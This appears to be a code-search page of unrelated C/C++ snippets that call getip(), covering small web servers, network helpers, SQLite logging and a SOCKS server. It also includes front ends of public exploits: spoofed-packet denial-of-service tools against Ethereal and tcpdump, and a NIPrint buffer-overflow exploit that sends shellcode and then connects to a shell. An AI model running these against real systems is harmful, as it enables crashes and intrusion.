Beispiel #1
/* begin. */
/* Command-line front end of the proof of concept: parses <dst host> [src host | nospoof],
 * prints a banner and status lines, then calls nbt_spoof() or nbt_nospoof() (defined
 * elsewhere) exactly once. Exits 1 on a usage error, 0 otherwise. */
int main(int argc,char **argv) {
    unsigned char nospoof=0;        /* 1 when argv[2] contains "nospoof": send from the real address */
    unsigned int daddr=0,saddr=0;   /* destination / source as returned by getip(); saddr 0 means "random" */
    printf("\n[*] Ethereal <= 0.10.10 SMB DoS.\n[*] by Nicob (code ripped from vade79)\n\n");
    if(argc<2) {
        printf("[*] syntax: %s <dst host> [src host(0=random)]\n",
               argv[0]);
        printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
        exit(1);
    }
    /* A 0 from getip() is treated as unresolvable. printe(msg,1) presumably terminates
     * the program (not visible here); if it returned, daddr==0 would flow on. */
    if(!(daddr=getip(argv[1])))
        printe("invalid destination host/ip.",1);
    if(argc>2) {
        /* strstr() is a substring match: any argument containing "nospoof" selects that mode. */
        if(strstr(argv[2],"nospoof"))nospoof=1;
        else saddr=getip(argv[2]);
    }
    printf("[*] destination\t: %s\n",argv[1]);
    if(!nospoof)
        printf("[*] source\t: %s (spoofed)\n",(saddr?argv[2]:"<random>"));
    else
        printf("[*] source\t: real IP\n");
    printf("[+] sending packet ...");
    fflush(stdout);
    /* Seeds random() for whatever the sender randomises; a time-based seed, not a secure one. */
    srandom(time(0));
    if(nospoof)nbt_nospoof(daddr);
    else nbt_spoof(daddr,saddr);
    printf(".");
    fflush(stdout);
    printf("\n[*] done.\n\n");
    fflush(stdout);
    exit(0);
}
Beispiel #2
/* begin. */
/* Command-line front end of the proof of concept: parses <dst host> [src host] [amount],
 * prints a banner, then calls rsvp_spoof() (defined elsewhere) once per packet with a
 * 50ms pause between sends. Exits 1 on a usage/argument error, 0 otherwise. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;          /* declared but never assigned here: the "source" line is always printed */
 unsigned int amt=DFL_AMOUNT;      /* packets to send; DFL_AMOUNT defined elsewhere */
 unsigned int daddr=0,saddr=0;     /* destination / source from getip(); saddr 0 means "random" */
 printf("[*] tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop "
 "DOS.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  exit(1);
 }
 /* printe(msg,1) presumably terminates the program (not visible here). */
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2)saddr=getip(argv[2]);
 /* atoi() result stored in an unsigned: a negative argument wraps to a very large count
  * and non-numeric input yields 0, which is rejected just below. */
 if(argc>3)amt=atoi(argv[3]);
 if(!amt)printe("no packets?",1);
 printf("[*] destination\t: %s\n",argv[1]);
 if(!nospoof)
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
 printf("[*] amount\t: %u\n\n",amt);
 printf("[+] sending(packet = .): ");
 fflush(stdout);
 /* amt is decremented before each iteration, so the seed differs per packet. */
 while(amt--){
  /* spice things up. */
  srandom(time(0)+amt);
  rsvp_spoof(daddr,saddr);
  printf(".");
  fflush(stdout);
  usleep(50000);
 }
 printf("\n\n[*] done.\n");
 fflush(stdout);
 exit(0);
}
Beispiel #3
// Record a traffic sample for the host identified by ss in the flow table.
//   ss  - ID string; getmac()/getip() extract the MAC and IP from it
//   liu - traffic volume for the interval
//   kai - interval start time
//   tt  - interval end time
// If a row for the same MAC/IP already exists whose start lies less than one
// time slice (shezhi.pian) before tt, liu is added to that row and its end
// moved to tt; otherwise a new row is inserted. Two or more matching rows are
// treated as a corrupt table and the process exits(-1).
// Uses the globals yuju (statement text), db, sqlf and sqlerr; sqlgeterr()
// reports the sqlite result code.
// NOTE(review): the statements are built by string concatenation. mac/ip come
// from getmac()/getip() and the numbers from str(); if any of those can ever
// carry a quote character the query becomes injectable — sqlite3_prepare_v2()
// with sqlite3_bind_*() would remove that risk. Confirm where ss originates.
void sqlflow(const string &ss,long long liu,long long kai,long long tt)
{
  const string mac=getmac(ss);
  const string ip=getip(ss);
  // Predicate shared by the lookup and the update: same MAC/IP, and the
  // existing row started less than shezhi.pian before tt.
  const string tiaojian="mac='"+mac+"' AND ip='"+ip+"' AND ("+str(tt)+"-start<"+str(shezhi.pian)+")";

  char **rows=NULL;
  int nrow=0;
  int ncol=0;
  yuju="SELECT * FROM flow WHERE "+tiaojian+";";
  sqlf=sqlite3_get_table(db,yuju.c_str(),&rows,&nrow,&ncol,&sqlerr);
  if (rows!=NULL)
    sqlite3_free_table(rows);
  sqlgeterr(sqlf);

  if (nrow>1)
    exit(-1);   // duplicate rows: refuse to guess which one to update

  if (nrow==0)
    yuju="INSERT INTO flow VALUES ('"+mac+"','"+ip+"',"+str(liu)+",'"+str(kai)+"','"+str(tt)+"');";
  else
    yuju="UPDATE flow SET data=data+"+str(liu)+",end='"+str(tt)+"' WHERE "+tiaojian+";";
  sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
  sqlgeterr(sqlf);
}
Beispiel #4
/* Serve one established session: read the first 24 bytes of the request into
 * the global buf, dispatch on the request line, then flush whatever remains
 * and disconnect. Each handler adds a time allowance to the global uptime.
 * recv_size()/recv0()/flush()/disconnect0(), getip() and the bagels*/send*
 * handlers are defined elsewhere. */
void handlesession(){	//handle a session once it's established
	/* Most specific first: "GET /favicon" and "GET /?G=" must be tried before the bare "GET /". */
	static const struct { const char *prefix; size_t len; } routes[] = {
		{ "POST /",       6  },
		{ "GET /favicon", 12 },
		{ "GET /?G=",     8  },
		{ "GET /",        5  },
	};
	enum { NROUTES = sizeof routes / sizeof routes[0] };
	unsigned int rsize=recv_size();
	printf("**rsz=%d\n",rsize);
	if (rsize>0){
		thisip.l=getip();
		if (recv0(buf,min(24,rsize))>0){ //24 bytes are enough to tell the request types apart
			printf("%s\n",buf);
			int route=NROUTES;   /* NROUTES = nothing matched */
			for (int k=0;k<NROUTES;k++){
				if (strncmp((char *)buf,routes[k].prefix,routes[k].len)==0){ route=k; break; }
			}
			switch (route){
				case 0:  bagelsinit();  uptime+=311; break; //new game, send the form
				case 1:  sendnak();     uptime+=100; break; //no favicon here
				case 2:  bagelsturn();  uptime+=376; break; //give player his turn
				case 3:  bagelsinit(0); uptime+=311; break; //new game, send the form
				default:
					printf("\nmystery meat\n");
					bagelsinit(0);
					uptime+=311;
					break;
			}
		}
	}
	if (rsize>0) flush(rsize);	//get rid of the received data
	disconnect0();	//in any case, we're done here
	printf("done\n>\n");
}
Beispiel #5
/* Send the BAGELS game page (HTTP header, instructions, guess form, link and
 * trailer) to the connected client. Inst1 goes out via send0() with an explicit
 * length so its terminating NUL is not transmitted; sendconst()/sendlit() are
 * the project's other transmit helpers. */
static void bagels_send_page(void){
	static unsigned char hdr1[]="HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
						"<html><body><span style=\"color:#0000A0\">\r\n"
						"<center><h1>Olduino 1802 BAGELS Server</h1></center>";
	static unsigned char Inst1[]=
		"I AM THINKING OF A 3 DIGIT NUMBER.<BR>TRY TO GUESS "
		"MY NUMBER AND I WILL GIVE YOU CLUES AS FOLLOWS:<BR>"
		"...PICO - ONE DIGIT IS IN THE WRONG PLACE<BR>"
		"...FERMI - ONE DIGIT IS IN THE CORRECT PLACE<BR>"
		"...BAGELS - NO DIGIT IS CORRECT<P>";
	static unsigned char gform[]="<p><form method=\"GET\">\r\n"
						"<input type=\"text\" name=\"G\">"
						"<input type=\"submit\" value=\"Enter Your Guess\">\r\n"
						"</form>";
	static unsigned char trlr[]="</body></html>\r\n\r\n";

	sendconst(hdr1);
	printf("I.\n");
	send0(Inst1,sizeof(Inst1)-1);
	printf(".I\n");
	sendconst(gform);
	sendlit("<a href=\"http://goo.gl/p4C0Cg\">Olduino</a>: An Arduino for the First of Us<p>");
	sendconst(trlr);
}

/* Start a new game for the current client: send the page, then pick a secret
 * (setsecret()) and store it in the slot getipslot() assigns to the client IP.
 * NOTE(review): strcpy() into secrets[thisipslot] is unbounded and the sizes of
 * secret and secrets[] are not visible here — confirm they match. */
void bagelsinit(){
	bagels_send_page();
	thisip.l=getip();
	thisipslot=getipslot(thisip);
	setsecret();
	strcpy((char*)secrets[thisipslot],(char*)secret);
	printf("IP: %d.%d.%d.%d,slot %d,secret %s\n",thisip.c[0],thisip.c[1],thisip.c[2],thisip.c[3],thisipslot,secrets[thisipslot]);
}
Beispiel #6
// Record the average speed of the host identified by ss over one database
// update interval: liu is the traffic volume, tt the end time of the interval,
// and the stored value is liu divided by shezhi.jiange (the interval length).
// Uses the globals yuju, db, sqlf and sqlerr; sqlgeterr() reports the result.
// NOTE(review): the INSERT is built by concatenation; mac/ip come from
// getmac()/getip() — if they can carry a quote character this is injectable,
// and sqlite3_bind_*() would be the fix. A zero shezhi.jiange divides by zero.
void sqlspeed(const string &ss,long long liu,long long tt)
{
  const long long sudu=liu/shezhi.jiange;
  const string mac=getmac(ss);
  const string ip=getip(ss);
  yuju="INSERT INTO speed VALUES ('"+mac+"','"+ip+"',"+str(sudu)+",'"+str(tt)+"')";
  sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
  sqlgeterr(sqlf);
}
Beispiel #7
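/* Resolve a fixed host, then resolve up to the first 100 host names read from
 * the file host_list_10000 (one per line) and print each result.
 * getip(host, ip, 0) is project code that writes a dotted-quad into ip.
 * Returns 0 on success, 1 when the host list cannot be opened. */
int main(void){
	char ip[16]="\0";
	char *host="baidu.com\0";
	/* stdin is redirected before the first lookup, as in the original; the
	 * result of freopen() is now checked instead of silently reading nothing. */
	if(freopen("host_list_10000","r",stdin)==NULL){
		perror("host_list_10000");
		return 1;
	}
	getip(host,ip,0);
	printf("ip=%s\n",ip);
	rewind(stdin);   /* start the list from the top (the original reopened the file) */
	char c[100];
	/* fgets() bounds the read; gets() could not and is gone from C11. Over-long
	 * lines are truncated, and the loop stops early at end of file. */
	for(int i=0;i<100;++i){
		memset(c,0,sizeof(c));
		if(fgets(c,sizeof(c),stdin)==NULL)
			break;
		c[strcspn(c,"\r\n")]='\0';   /* drop the line terminator gets() used to strip */
		memset(ip,0,sizeof(ip));
		getip(c,ip,0);
		printf("i=%d  ip=%s\n",i+1,ip);
	}
	return 0;
}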
Beispiel #8
/* Command-line front end of the proof of concept: connects to argv[1] on TCP 515,
 * sends one assembled buffer, then runs telnet against the same host on port SHELL.
 * RET, SHELL and shellcode are defined elsewhere. Always returns 0. */
int main(int argc, char **argv) {

#ifdef _WIN32
	WSADATA wsaData;
#endif

	int sock;
	struct sockaddr_in sockstruct;
	char tmp[2000];


	/* argv[argc] is NULL, so this is equivalent to argc < 2. */
	if(!argv[1]) { printf("Usage: %s <address>\n",argv[0]);exit(0); }

#ifdef _WIN32

	if(WSAStartup(0x101,&wsaData)){
        printf("Unable to initialize WinSock lib.\n");
        exit(0);
	}

#endif

	memset(sockstruct.sin_zero,0x00,sizeof(sockstruct.sin_zero));
	/* socket() result is not checked; on failure connect() below fails and the
	 * program still proceeds to the telnet step. sin_family is set to PF_INET
	 * where AF_INET is expected (the two are equal on common platforms). */
	sock=socket(PF_INET,SOCK_STREAM,0);
	sockstruct.sin_family=PF_INET; 
    	sockstruct.sin_addr.s_addr=getip(argv[1]);
    	sockstruct.sin_port=htons(515);

	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

	    printf("[+] Connected to %s:515!\n",argv[1]);

		/* The buffer is built with strlen(tmp) as the running offset, so a zero
		 * byte inside RET or the shellcode ends the transmitted data early.
		 * The RET store is an unaligned, type-punned write of sizeof(long) bytes. */
		memset(tmp,0x00,sizeof tmp);
		memset(tmp,0x41,49);
		*(long *)&tmp[strlen(tmp)]=RET;
		memset(tmp+strlen(tmp),0x90,50);
		memcpy(tmp+strlen(tmp),&shellcode,strlen(shellcode));
		send(sock,tmp,strlen(tmp),0);
		printf("[+] Exploit code was sent!\n");
    }

#ifdef _WIN32
	closesocket(sock);
	WSACleanup();
#else
	close(sock);
#endif

	/* argv[1] is interpolated unescaped into a command line handed to the shell:
	 * shell metacharacters in that argument are executed as commands. */
	printf("[+] Connecting to %s:%d\n",argv[1],SHELL);
	sprintf(tmp,"telnet %s %d\n",argv[1],SHELL);
	system(tmp);
	printf("[-] Not connected! NIPrint probably not vulnerable!\n");

	return 0;
}
Beispiel #9
/* Handle a POST: toggle the LED state (ledmode 1 -> 0, anything else -> 1),
 * drive the Q output to match (the inline " seq"/" req" mnemonics, presumably
 * the 1802 SEQ/REQ instructions), resend the form, and log the client IP when
 * it differs from the last one seen. getip()/sendform() and the globals
 * ledmode, cmdip and oldip are defined elsewhere. */
void handlepost(){
	ledmode = (ledmode==1) ? 0 : 1;
	if (ledmode){
		asm(" seq\n"); //Q led on
	} else {
		asm(" req\n"); //Q led off
	}
	cmdip.l=getip();
	sendform();
	if (cmdip.l!=oldip.l){
		printf("IP %d.%d.%d.%d\n",cmdip.c[0],cmdip.c[1],cmdip.c[2],cmdip.c[3]);
		oldip.l=cmdip.l;
	}
}
Beispiel #10
// Derive this worker's id from the host IP and the current process/thread and
// reset the sequence state:
//   worker_id = ((BKDRHash(ip) % 31) << (workerIdBits - 5) | ((pid << 2 | tid) % 31)) & maxWorkerId
// getip(), BKDRHash(), workerIdBits and maxWorkerId are defined elsewhere.
// NOTE(review): both components are reduced modulo 31, so two hosts or threads
// can easily end up with the same worker_id; uniqueness is not guaranteed.
idworker::idworker()
{
	char ip[100];
    getip(ip,sizeof(ip));
    const uint64_t ip_part = BKDRHash(ip) % 31;
    const uint64_t pid_part = getpid();
    const uint64_t tid_part = pthread_self();   // pthread_t is opaque; using it as an integer is non-portable
	const uint64_t machine_part = ((pid_part << 2) | tid_part) % 31;

	worker_id = ((ip_part << (workerIdBits - 5)) | machine_part) & maxWorkerId;
	sequence = 0;
	lastTimestamp = 0;
}
Beispiel #11
/* Send the game page: header (with the page counter spliced in), the two
 * instruction blocks, the guess form, the link and the trailer. The hdr1a/
 * hdr1b/Inst1/Inst2/gform/olduinolink/trlr buffers, pnbuf and the helpers
 * sendconst()/send0s()/itoa() are defined elsewhere. */
static void send_game_page(void){
	sendconst(hdr1a);
	send0s(itoa(pages,pnbuf));
	sendconst(hdr1b);
	sendconst(Inst1);
	sendconst(Inst2);
	sendconst(gform);
	sendconst(olduinolink);
	sendconst(trlr);
}

/* Start a new game for the current client: bump the games/pages counters,
 * send the page, then pick a secret (setsecret()) and store it in the slot
 * getipslot() assigns to the client IP.
 * NOTE(review): strcpy() into secrets[thisipslot] is unbounded; the sizes of
 * secret and secrets[] are not visible here — confirm they match. */
void bagelsinit(){
	games++;
	pages++;
	send_game_page();
	thisip.l=getip();
	thisipslot=getipslot(thisip);
	setsecret();
	strcpy((char*)secrets[thisipslot],(char*)secret);
	printf("IP: %d.%d.%d.%d,slot %d,secret %s\n",
		thisip.c[0],thisip.c[1],thisip.c[2],thisip.c[3],thisipslot,secrets[thisipslot]);
}
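/* Open a TCP connection to host:port and return the connected descriptor,
 * which is also stored in the global sock. getip() (project code) supplies the
 * IPv4 address in network byte order. On socket()/connect() failure
 * QUIT(ERR_CONN) is invoked. The socket is made non-blocking before return. */
int                     connect_to_host(char * host, int port)
{
    struct sockaddr_in  s_in;
    int                 flags;

    memset( &s_in, 0, sizeof s_in );
    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = getip( host );
    s_in.sin_port = htons( port );
    /* Only -1 signals failure; descriptor 0 is a valid socket when stdin is closed. */
    if ((sock = socket( AF_INET, SOCK_STREAM, 0 )) < 0)
        QUIT(ERR_CONN);
    if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)))
        QUIT (ERR_CONN);
#ifdef  SHITTEST
            sleep(15);
#endif
    /* Add O_NONBLOCK to the existing flags instead of replacing them wholesale. */
    flags = fcntl(sock, F_GETFL, 0);
    if (flags < 0)
        flags = 0;
    (void) fcntl(sock, F_SETFL, flags | O_NONBLOCK);
    return (sock);
}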
Beispiel #13
/* Receive one datagram on the IPv4 socket s4 through the global msghdr mh
 * (presumably set up elsewhere to scatter into buf), remember the peer
 * address in peer/sl, look up the receiving interface with v4if() and hand
 * the packet to handle(). A recvmsg() failure is fatal (exit status 3). */
static void recv4() {
  mh.msg_name=&sa4;
  mh.msg_namelen=sizeof(sa4);
  int len=recvmsg(s4,&mh,0);
  if (len==-1) {
    perror("recvmsg");
    exit(3);
  }
  peer=(struct sockaddr*)&sa4;
  sl=sizeof(sa4);

  int ifindex=v4if();
  getip(ifindex);

  handle(s4,buf,len,ifindex);
}
Beispiel #14
/* Serve one established session on the WIZnet socket: wait (up to 10 polls,
 * 20ms apart) for received data, read a 16-byte prefix into the global buf,
 * dispatch on the request line, then flush the remaining data and disconnect.
 * wizGetCtl16()/recv0()/flush()/wizCmd(), getip(), the bagels*/send* handlers
 * and the globals thisip/buf/sessions are defined elsewhere. */
void handlesession() {	//handle a session once it's established
    /* Most specific first: the "GET /..." variants must precede the bare "GET /". */
    static const struct { const char *prefix; size_t len; } routes[] = {
        { "POST /",       6  },
        { "GET /favicon", 12 },
        { "GET /bitmap",  11 },
        { "GET /?G=",     8  },
        { "GET /T",       6  },
        { "GET /",        5  },
    };
    enum { NROUTES = sizeof routes / sizeof routes[0] };
    unsigned int polls_left=10;
    unsigned int rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
    while(rsize==0 && polls_left-->0) {
        delay(20);
        printf("re-size ");
        rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
    }
    printf("**rsz=%d\n",rsize);
    if (rsize>0) {
        thisip.l=getip();
        if (recv0(buf,min(16,rsize))>0) { //16 bytes are enough to tell the request types apart
            printf("%s\n",buf);
            int route=NROUTES;   /* NROUTES = nothing matched */
            for (int k=0;k<NROUTES;k++) {
                if (strncmp((char *)buf,routes[k].prefix,routes[k].len)==0) { route=k; break; }
            }
            switch (route) {
                case 0:  bagelsinit();  break; //initialize game, send the form
                case 1:  sendfavicon(); break;
                case 2:  sendbmp();     break;
                case 3:  bagelsturn();  break; //give player his turn
                case 4:  bagelspeek();  break; //show the IP table
                case 5:  bagelsinit(0); break; //initialize game, send the form
                default:
                    printf("\nmystery meat\n");
                    bagelsinit(0);
                    break;
            }
        }
    }
    printf("flushing %d\n",rsize);
    if (rsize>0) flush(rsize);	//get rid of the received data
    wizCmd(CR_DISCON);// Disconnect the connection- we're done here
    printf("done\n>\n");
    sessions++;
}
Beispiel #15
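/* CGI entry point for the air-conditioner control page (cgic convention).
 * Reads the backend address from ip_config.conf via getip() (project code),
 * connects to it on port 8887, sends one KI_AIRCONDITIONER request whose
 * ttl/mo/extent fields carry the form values conditioner/mode/passed, and
 * prints the reply as "conditioner=<n>;statuss=<m>".
 * Returns 0 normally, 1 when the backend connection cannot be opened. */
 int cgiMain()
{
	 char *filename = "ip_config.conf";
	 char ip[16];
	 unsigned short portt = 8887;
	 int fd;
	 int readnd = 0;
	 size_t reqlen;
	 int passed, conditioner, mode;
	 struct common_packet request;
	 struct replay_packet replay;

	 getip(filename, ip);
	 fd = tcp_init_client(ip, portt);
	 cgiHeaderContentType("text/html");
	 /* NOTE(review): assumes tcp_init_client() returns a negative value on
	  * failure — confirm against its definition. */
	 if (fd < 0) {
	 	return 1;
	 }

	 /* Zero the whole request so padding and the data field are never sent
	  * uninitialized (the original left request.data indeterminate). */
	 memset(&request, 0, sizeof request);
	 request.head.len = sizeof(request.data);
	 request.head.encrpyt = ENCRPYT_NO;
	 request.head.ki = KI_AIRCONDITIONER;

	 cgiFormInteger("conditioner", &conditioner, 0);
	 cgiFormInteger("mode", &mode, 0);
	 cgiFormInteger("passed", &passed, 0);
	 request.head.ttl = conditioner;
	 request.head.mo = mode;
	 request.head.extent = passed;

	 /* The original sends sizeof(struct register_struct) bytes from &request.
	  * That count is kept (the peer's expected length is not visible here) but
	  * clamped so the write can never read past the request object.
	  * NOTE(review): if the two sizes differ, one side of the protocol is wrong. */
	 reqlen = sizeof(struct register_struct);
	 if (reqlen > sizeof request)
	 	reqlen = sizeof request;
	 writen(fd, (void *)&request, reqlen);

	 /* Read straight into a properly typed object rather than casting a char
	  * buffer: no size mismatch, no alignment or aliasing concerns. */
	 readnd = readn(fd, (void *)&replay, sizeof replay);
	 if (readnd == (int) sizeof replay && replay.head.ki == KI_REPLAY) {
	 	fprintf(cgiOut, "conditioner=%d;statuss=%d", conditioner, replay.data);
	 }
	 tcp_close(fd);
	 return 0;
}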
Beispiel #16
/* Receive one datagram on the IPv6 socket s6 through the global msghdr mh,
 * remember the peer address in peer/sl, determine the receiving interface —
 * v4if() for IPv4-mapped peers, otherwise the scope id carried in the peer
 * address — and hand the packet to handle(). recvmsg() failure exits with 3. */
static void recv6() {
  mh.msg_name=&sa6;
  mh.msg_namelen=sizeof(sa6);
  int len=recvmsg(s6,&mh,0);
  if (len==-1) {
    perror("recvmsg");
    exit(3);
  }
  peer=(struct sockaddr*)&sa6;
  sl=sizeof(sa6);

  int ifindex = IN6_IS_ADDR_V4MAPPED(sa6.sin6_addr.s6_addr)
              ? v4if()
              : (int)sa6.sin6_scope_id;
  getip(ifindex);

  handle(s6,buf,len,ifindex);
}
/* Connect to a host */
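/* Open a TCP connection to host:port and return the connected descriptor.
 * getip() (project code) supplies the IPv4 address in network byte order.
 * On socket() or connect() failure a message is printed and the process
 * exits with status 1, so the function never returns an invalid descriptor. */
int connect_host(char* host, int port)
{
	struct sockaddr_in s_in;
	int sock;

	memset(&s_in, 0, sizeof s_in);   /* zero sin_zero and any padding as well */
	s_in.sin_family = AF_INET;
	s_in.sin_addr.s_addr = getip(host);
	s_in.sin_port = htons(port);

	/* Only -1 is an error; descriptor 0 is legal when stdin has been closed. */
	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("Could not create a socket\n");
		exit(1);
	}

	if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
		printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
		close(sock);
		exit(1);
	}

	return sock;
}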
Beispiel #18
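/* Print this machine's IP address as obtained by getip() (project code that
 * returns non-zero on success and presumably stores the address in *s in the
 * byte layout inet_ntop() expects — confirm). Returns 0 on success, 1 on
 * failure; the original returned 0 silently when getip() failed. */
int main(void)
{
    long s = 0;
    char buf[MAX];

    if (!getip(&s)) {
        fprintf(stderr, "getip failed\n");
        return 1;
    }
    /* inet_ntop() takes an address family (AF_INET), not a protocol family;
     * the two coincide on common platforms, which is why PF_INET worked.
     * Only the first sizeof(struct in_addr) bytes of s are read. */
    if (inet_ntop(AF_INET, (const void *)&s, buf, sizeof buf) == NULL) {
        perror("inet_ntop");
        return 1;
    }
    printf("my ip address is %s\n", buf);
    return 0;
}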
Beispiel #19
/* Serve one established session on the WIZnet socket: wait (up to 10 polls,
 * 20ms apart) for received data, read a 16-byte prefix into the global buf,
 * dispatch on the request line, flush the rest of the data and disconnect.
 * Unrecognised requests are answered with send405(). wizGetCtl16()/recv0()/
 * flush()/wizCmd(), getip(), handlepost()/sendnak()/sendform()/send405() and
 * the globals sessip/buf/sessions are defined elsewhere. */
void handlesession(){	//handle a session once it's established
	/* Most specific first: "GET /favicon" must be tried before the bare "GET /". */
	static const struct { const char *prefix; size_t len; } routes[] = {
		{ "POST /",       6  },
		{ "GET /favicon", 12 },
		{ "GET /",        5  },
	};
	enum { NROUTES = sizeof routes / sizeof routes[0] };
	unsigned int polls_left=10;
	unsigned int rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
	while(rsize==0 && polls_left-->0){
		delay(20);
		printf("re-size ");
		rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
	}
	printf("**rsz=%d\n",rsize);
	if (rsize>0){
		sessip.l=getip();
		if (recv0(buf,min(16,rsize))>0){ //16 bytes are enough to tell the request types apart
			printf("%s\n",buf);
			int route=NROUTES;   /* NROUTES = nothing matched */
			for (int k=0;k<NROUTES;k++){
				if (strncmp((char *)buf,routes[k].prefix,routes[k].len)==0){ route=k; break; }
			}
			switch (route){
				case 0:
					printf("\np\n");
					handlepost(); //toggle LED, send the form
					break;
				case 1:
					printf("\nf\n");
					sendnak(); //no favicon here
					break;
				case 2:
					printf("\ng\n");
					sendform(); //send the form
					break;
				default:
					printf("\nmystery meat\n%s\n",buf);
					printf("IP %d.%d.%d.%d\n",sessip.c[0],sessip.c[1],sessip.c[2],sessip.c[3]);
					send405(); //disallow oddball requests
					break;
			}
		}
		printf("flushing %d\n",rsize);
		if (rsize>0) flush(rsize);	//get rid of the received data
	}
	printf("\nd\n");
	wizCmd(CR_DISCON);// Disconnect the connection- we're done here
	printf(">\n");
	sessions++;
}
Beispiel #20
/* Wait for the peer's response on the WIZnet socket (up to 500 polls, 20ms
 * apart), print up to 1023 bytes of it from the global buf, then flush the
 * remaining data and disconnect. wizGetCtl16()/recv0()/flush()/wizCmd() and
 * getip() are project code; thisip records the peer address. */
void getresp() {	//handle a session once it's established
    unsigned int polls_left=500;
    unsigned int rsize;
    printf("getting response\n");
    /* Poll the receive size until data shows up or the poll budget runs out. */
    for (rsize=wizGetCtl16(SnRX_RSR); rsize==0 && polls_left-->0; rsize=wizGetCtl16(SnRX_RSR)) {
        delay(20);
        printf("re-size ");
    }
    printf("**rsz=%d\n",rsize);
    if (rsize>0) {
        thisip.l=getip();
        if (recv0(buf,min(1023,rsize))>0) { //get some characters
            printf("%s\n",buf);
        }
    }
    printf("flushing %d\n",rsize);
    if (rsize>0) flush(rsize);	//get rid of the received data
    wizCmd(CR_DISCON);// Disconnect the connection- we're done here
    printf("done\n>\n");
}
Beispiel #21
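/*
 * Parse a "[ip:]path" specification at p into *addr and path.
 * getip() (project code) consumes a leading IP address and advances p. When it
 * finds one, a ':' must follow; when it finds none, the spec must be an
 * absolute path ("/...") and siaddr (the server address) must be given, in
 * which case siaddr is used.
 * Returns 1 on success, 0 when the form is not recognised or the path does not
 * fit in MNAMELEN bytes — previously an over-long path was silently truncated.
 */
static int
setfs(struct sockaddr_in *addr, char *path, char *p,
    const struct in_addr *siaddr)
{

	if (getip(&p, &addr->sin_addr) == 0) {
		if (siaddr != NULL && *p == '/')
			memcpy(&addr->sin_addr, siaddr, sizeof(struct in_addr));
		else
			return 0;
	} else {
		if (*p != ':')
			return 0;
		p++;
	}
		
	addr->sin_len = sizeof(struct sockaddr_in);
	addr->sin_family = AF_INET;

	/* strlcpy() returns the length it tried to copy; >= MNAMELEN means truncation. */
	if (strlcpy(path, p, MNAMELEN) >= MNAMELEN)
		return 0;
	return 1;
}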
Beispiel #22
/** PASV command */
void ftp_pasv(Command *cmd, State *state)
{
  if(state->logged_in){
    int ip[4];
    int port;
    char buff[255];
    char *response = "227 Entering Passive Mode (%d,%d,%d,%d,%d,%d)\n";
    port = gen_port();
    getip(state->connection,ip);

    /* Close previous passive socket? */
    close(state->sock_pasv);

    /* Start listening here, but don't accept the connection */
    state->sock_pasv = create_socket(port);
    printf("port: %d\n",port);
    sprintf(buff,response,ip[0],ip[1],ip[2],ip[3],port>>8,port&0xff);
    state->message = buff;
    state->mode = SERVER;
    puts(state->message);

  }else{
Beispiel #23
/*
 * Serve one SOCKS client (version 4, 4a or 5) connected on param->clisock:
 * parse the greeting and request, resolve the target, run the server's
 * authfunc, prepare the remote socket for CONNECT / BIND / UDP ASSOCIATE, send
 * the reply and relay traffic until one side is done. Ends in freeparam(param)
 * and returns NULL, except for the redirectfunc hand-off in the CONNECT case.
 * Byte-level protocol reads go through sockgetcharcli()/sockgetlinebuf()
 * (project code) with the timeouts in conf.timeouts. RETURN(code) is a project
 * macro; judging by the CLEANRET label below it records the result code in
 * param->res and jumps there.
 */
void * sockschild(struct clientparam* param) {
 int res;
 unsigned i=0;
 SOCKET s;
 unsigned size;
 SASIZETYPE sasize;
 unsigned char * buf=NULL;      /* scratch buffer: BUFSIZE bytes, re-allocated to LARGEBUFSIZE for UDP relay */
 unsigned char c;               /* SOCKS5 address type (1 = IPv4, 3 = domain name); forced to 1 for SOCKS4 */
 unsigned char command=0;       /* 1 = CONNECT, 2 = BIND, 3 = UDP ASSOCIATE; 0 once known to be invalid */
 struct pollfd fds[3];
 int ver=0;                     /* SOCKS version byte from the client: 4 or 5 */
 int havepass = 0;              /* SOCKS5: 2 when username/password auth was offered and the server wants users */
 struct sockaddr_in sin;
 int len;


 param->req.sin_addr.s_addr = 0;
 param->service = S_SOCKS;

 if(!(buf = myalloc(BUFSIZE))) {RETURN(21);}
 memset(buf, 0, BUFSIZE);
 /* First byte is the protocol version; anything but 4 or 5 is rejected (401). */
 if ((ver = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0)) != 5 && ver != 4) {
	RETURN(401);
 } /* version */
 param->service = ver;
 if(ver == 5){
	 /* SOCKS5 method negotiation: nmethods, then one byte per method. Method 2
	  * (username/password) is chosen only when the server wants a user name
	  * (!nouser); otherwise the reply selects method 0 (no authentication). */
	 if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(441);} /* nmethods */
	 for (; i; i--) {
		if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(442);}
		if (res == 2 && !param->srv->nouser) {
			havepass = res;
		}
	 }
	 buf[0] = 5;
	 buf[1] = havepass;
	 if(socksend(param->clisock, buf, 2, conf.timeouts[STRING_S])!=2){RETURN(402);}
	 if (havepass) {
		/* Username/password sub-negotiation: version byte 1, then length-
		 * prefixed user name and password (each at most 255 bytes, so they fit
		 * in buf). Values already set on param (e.g. by the caller) are kept. */
		if (((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0))) != 1) {
